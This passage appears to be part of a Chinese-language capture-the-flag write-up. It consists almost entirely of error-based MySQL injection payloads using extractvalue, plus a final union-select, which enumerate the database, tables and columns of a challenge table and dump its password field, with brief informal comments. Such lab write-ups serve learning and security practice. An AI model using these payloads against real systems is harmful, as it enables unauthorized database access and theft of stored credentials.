1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '
复制代码
爆表名
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '
复制代码
先爆这个love这个表里面的列,毕竟他和题目一样名字
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '
复制代码
然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)
1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '
复制代码
然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的
1' union select 1,2,group_concat(password) from l0ve1ysq1#